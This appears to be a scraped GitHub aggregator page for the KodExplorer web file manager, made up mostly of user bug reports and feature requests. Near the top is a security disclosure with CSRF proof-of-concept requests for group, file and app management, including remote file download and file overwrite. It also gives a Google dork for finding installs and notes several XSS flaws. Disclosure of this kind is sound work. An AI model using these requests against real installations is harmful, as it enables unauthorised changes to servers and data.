kalcaddle / kodexplorer Goto Github PK
View Code? Open in Web Editor NEWA web based file manager,web IDE / browser based code editor
Home Page: https://kodcloud.com
A web based file manager,web IDE / browser based code editor
Home Page: https://kodcloud.com
Exploit Title : KODExplorer Multiple Vulnerability
Product Vendor: kalcaddle
Product Link : http://kalcaddle.com/
Google Dorks : intext:"Powered by KodExplorer"
Exploit Author: Ben Khlifa Fahmi
I - CSRF Group Managment :
Description : an attacker can add , remove or edit any User Group by sending an exploit link to a loggeed in admin.
Vulnerable Controller : group.class.php
Proof of Concept :
Add Group : POST Request
action url : http://localhost/index.php?group/add&role=[group name]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
Edit Group : POST Request
action url : http://localhost/index.php?group/add&role_old=[group name to edit]&name=[group description]&ext_not_allow=[allowed extension(ex: php|jsp|etc..]
POSTDATA=explorer%3Amkfile=1&app%3Auser_app=1&explorer%3Amkdir=1&explorer%3ApathRname=1&explorer%3ApathDelete=1&explorer%3ApathInfo=1&explorer%3ApathInfoMuti=1&explorer%3ApathCopy=1&explorer%3ApathCute=1&explorer%3ApathCuteDrag=1&explorer%3Aclipboard=1&explorer%3ApathPast=1&explorer%3Azip=1&explorer%3Aunzip=1&explorer%3Asearch=1&editor%3AfileSave=1&explorer%3AfileUpload=1&explorer%3AserverDownload=1&explorer%3AfileDownload=1&userShare%3Aset=1&userShare%3Adel=1&user%3AchangePassword=1&setting%3Aset=1&fav%3Aedit=1&fav%3Aadd=1&fav%3Adel=1&member%3Aget=1&member%3Aadd=1&member%3Aedit=1&member%3Adel=1&group%3Aget=1&group%3Aadd=1&group%3Aedit=1&group%3Adel=1
Delete Group : http://localhost/index.php?group/del&role=[group_name]
II - CSRF on File Managment :
Description : an attacker can add , upload file from external site , delete or edit file/path by sending a link to a logged in administrator.
Vulnerable Controller : explorer.class.php
Proof of Concept :
Add a file(1) : http://localhost/index.php?explorer/mkfile&path=[file name]
Delete file : POST Request
action URL: http://localhost/index.php?explorer/pathDelete
post data : list[[{"type":"file","path":"[path to file you want to remove]"}]]
Upload File(2): http://localhost/index.php?explorer/serverDownload&type=download&save_path=[path where to save file]&url=[url to external file]&uuid=[any uuid you want]
Edit file : POST Request
action URL:POST http://localhost/index.php?editor/fileSave
Post Data: path[path to file]\ncharset[utf-8]\nfilestr[[file content]]
III - CSRF on App Managment :
Description : an attacker can add, edit , remove any app by sending a link to a logged in admin.
Vulnerable Controller : app.class.php
Proof of Concept :
Add app : POST request
action url : http://localhost/index.php?app/add&name=a
POST DATA : data[%257B%2522type%2522%253A%2522url%2522%252C%2522content%2522%253A%2522[url of your app]%2522%252C%2522group%2522%253A%2522others%2522%252C%2522name%2522%253A%2522[you app name]%2522%252C%2522desc%2522%253A%2522[you app description]%2522%252C%2522icon%2522%253A%2522oexe.png%2522%252C%2522width%2522%253A%2522800%2522%252C%2522height%2522%253A%2522600%2522%252C%2522simple%2522%253A0%252C%2522resize%2522%253A1%257D]
Delete App : http://localhost/index.php?app/del&name=[your app]
IV - Multiple Self XSS:
Description : the KODExplorer suffer from many Self XSS, vulnerable module to XSS are , Username , App Name , App Source , Folder Name , File Name , Group Name. to execute it just inject html code as one of the vulnerable module above.
V - Solution :
I have released a fix on my github account you can clone it or just wait for a patch to be released on the next version as i have reported all possible vulnerability ,
Thanks : I want to say "thank you" for:
- Tunisian Whitehats Security (@WhitehatsTN) http://www.whitehats.tn
- Arab Oracle Users Group (@araboug) http://www.araboug.org
- @RaisoMos , @tws_bayrem , @tws_charfeddine , @achref_vip , @tws_amine.
把该项目fork到你的项目下
在DaoCloud上注册个账号 https://www.daocloud.io/
1.在'代码构建"中新建项目,设置名称,代码源选择你fork的本项目,然后构建,等待成功即可。
2.构建成功后,点击”查看构建好的镜像“,点击部署最新版,等待部署成功
3.部署成功后,你就可以根据提供好的url访问啦。(DaoCloud文档,客服很给力的,不懂的可以随便问,哈哈)
一毛钱不花,弄一个。哈哈哈
打开几百个文件的文件夹,打开速度很慢,怎么优化一下?
when I use the Kod in my Raspberry Pi II(OS is base in debian),I found that when the size of files whick more than 2GB,the files size are incorrect.then I fixed this problem with follow mathod:
/lib/function/file.function.php
turn :
function get_filesize($path){
@$ret = abs(sprintf("%u",filesize($path)));
return (int)$ret;
}
to this:
function get_filesize($path){
@$ret = abs(sprintf("%u",filesize($path)));
return $ret;
}
but, when files size over 4G,It's still incorrect.
then add a function "fsize()" before "get_filesize()":
function fsize($file) {
// filesize will only return the lower 32 bits of
// the file's size! Make it unsigned.
$fmod = filesize($file);
if ($fmod < 0) $fmod += 2.0 * (PHP_INT_MAX + 1);
// find the upper 32 bits
$i = 0;
$myfile = fopen($file, "r");
// feof has undefined behaviour for big files.
// after we hit the eof with fseek,
// fread may not be able to detect the eof,
// but it also can't read bytes, so use it as an
// indicator.
while (strlen(fread($myfile, 1)) === 1) {
fseek($myfile, PHP_INT_MAX, SEEK_CUR);
$i++;
}
fclose($myfile);
// $i is a multiplier for PHP_INT_MAX byte blocks.
// return to the last multiple of 4, as filesize has modulo of 4 GB (lower 32 bits)
if ($i % 2 == 1) $i--;
// add the lower 32 bit to our PHP_INT_MAX multiplier
return ((float)($i) * (PHP_INT_MAX + 1)) + $fmod;
}
and turn get_filesize() to this:
function get_filesize($path){
@$ret = fsize($path);
return $ret;
}
Hi,
In the previous versions that I used of kodexplorer I did some "not easy" changes to your code to skip the login page but in this new version this change is not working anymore.
Maybe you can help me with an easiest way: I have a private server and I want my user to access the KodExplorer without login, I want him to be logged in automatically as admin. How can I do that?
不部署在公网,仅限于本地局域网内,如何实现office文件访问?
使用busybox+pgp-cgi部署到pc上没有问题,但是部署到我的手机上(android),浏览器访问就出现了这个问题。
windows环境目录排除不了,或者是我的设置方式不对,文件管理中怎么不显示工程以外目录(如C:\windows等)。不知道需要KODExplorer设置还是Apache服务器设置,以前没用过Apache服务器。希望给个windows环境下详细点的目录排除方法,谢谢!
谢谢
If I choose "more > duplicate" on a folder, it does not do anything.
In the previous version, I has to click "reload tree", in this version, nothing work.
因为我看到的都是demo中的文件。
Hello,
What about IP filtering, in option set a lit of IP allowed, only these IP can access the program.
什么时候支持FTP用户登录啊,就像net2ftp一样的那种。linux服务器不好弄
wrong with pclzip
Line 219 should be like this : if ((!function_exists('gzopen64')) && (!function_exists('gzopen')))
Hello,
In the new version, when opening a latin1 iso-8859-1 encoded file, I get the following error:
Warning: mb_convert_encoding(): Illegal character encoding specified in /var/www/kod/controller/editor.class.php on line 34
移动端访问文件管理时点击PHP文件,该文件会被服务器执行,感觉比较危险,不知是bug还是feature
手机用administrator账户打开时,打开文件显示的不是文件的内容,而是文件在网站上的链接。
上传图片的时候 经常掉线 需要重新登陆 有别的童鞋遇到吗?
3.1 提示自动下载更新,但一直报下载失败。-- 我到data目录看了,又下载了有3.12 的zip文件。
对了,编辑器无法高亮。 请求的js 路径出错了
例如我部署的地址是http://aaa.com/filemanager/ (虚拟目录)
实际应用物理路径是d:/www/website/KODExplorer
使用分享文件的功能时,分享地址会变成这样,我无法直接复制后将地址发布出去,必须手工修改。
http://aaaa.com/D:/www/website/KODExplorer/index.php?share/file&user=admin&sid=SOrPHAtG
其他PHP 分发都正常,只有芒果云不能用,
Apache 分发正常,但期望的是可以由Nginx 分发,效率也比较高
分享文件夹后, 获取文件列表, 如果文件夹中存在大量图片, 则会通过index.php?share/image代理显示图片, 造成短时间内请求数很大, 触发check_post_many()方法并发控制, 系统自动登出...
Hi sir, when will you release the new version of this awesome plugin? I really need it cause the current version has lots of bugs when uploading folders with subfolders (drag'n'drop).
When I open kodexplorer/index.php , it says:
Warning: Unexpected character in input: ' in /Applications/AMPPS/www/kodexplorer/index.php on line 1
Parse error: syntax error, unexpected T_INCLUDE in /Applications/AMPPS/www/kodexplorer/index.php on line 2
I didn't change my index.php and even config/config.php!
HI ,
I am Ben Khlifa Fahmi a security researcher from the Security Team "Tunisian Whitehats Security" We have recently identified some security bug on your script ,
This bug is a cross-site scripting,
Impact : Critical ( 👎 )
Vulnerable template : "template/file.php"
vulnerable line : 55
Vulnerable Code : <script src="./index.php?share/common_js&user=&sid=&#="></script>
Solution ;
change the line 55 with this new line :
如题,百度的BAE和阿里的ACE部署后,默认使用临时空间,用户填入相应的云存储地址和key后切换到管理云存储.
目前Kodexplorer满足了作为一个文件管理器的大部分功能,但是使用云存储会是未来主流.
如果想对程序的功能进行拓展,应该怎么做?官网没找到有文档,但是在程序里面我看到有lib/plugins这样的文件夹……
I assigned the right permissions to the folder but I'm still getting the error below
error:
kodexplorer/data/system can't write
kodexplorer/data/User can't write
kodexplorer/data/thumb can't write
Please how can i resolve the error
Thank you
发现post到服务器的是
member/edit:
name:project
name_to:project
role_to:default
password_to112233:
密码那项错了
希望添加百度云的应用,这样方便把文件下载到nas中来。
An error occurred
We're sorry, but for some reason we can't open this for you.
Markdown文件打开时显示预览内容,这个有计划么?
对不起,是我自己改里面的代码改挂了。
checkExt() 函数加一个判断就可以解决问题。
zip压缩包为在windows环境下打包,KODExplorer放置在linux服务器中,字符集的不同导致解压结果仅为一个空压缩包,而不是正常的文件,
我上传一个10+m的视频,上传到一部分后就直接提示上传失败了!!
Hi,
There is a serious bug on your library and I would like to help you reporting it.
Open an empty directory on file explorer of KodExplorer and leave it open inside the browser. After that drag a folder with some subdirectories/files inside of it from the computer to the browser. The first I do that everything will work fine.
But if I do that another time all kind of unexpected behaviour may happen. Instead of overwriting the files, KodExplorer creates several directories in the wrong places inside the already upload folder. It corrupts all the tree. It's very easy to reproduce.
The expected behaviour should be this: if I overwrite a folder it should ovewrite every file/directory inside of it. But it's not what happens. If you need more info I will be glad to help you.
NOTE: on previous version overwriting was never good but at this version it makes a mess when overwriting.
输入错误密码三次后验证码显示不出来,请问该问题如何解决
When I try to delete a file I got this error:
"Path can't write, check the permission"
I can edit, move, rename but not delete.
If I set 777 on the file or the folder, no change.
When I change settings in the editor (ACE), they are not saved (in fact, there is no button to save).
版本3.12 桌面模式下点击图标右键,选择修改应用,名称不能删除,不支持光标移动,
为什么在config里面打开了php错误提示?还是发布版本的时候忘记了修改?一些提示没有正常显示了。
@ini_set("display_errors","on");
IE 9上传文件失败
完美取代FTP管理:可用于服务器文件管理,支持图片、音乐、视频预览,在线解压缩,文件夹拖拽上传……。
你们所说的在线解压缩在哪里?我可找不到这功能。
补充一下,是tar的包
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.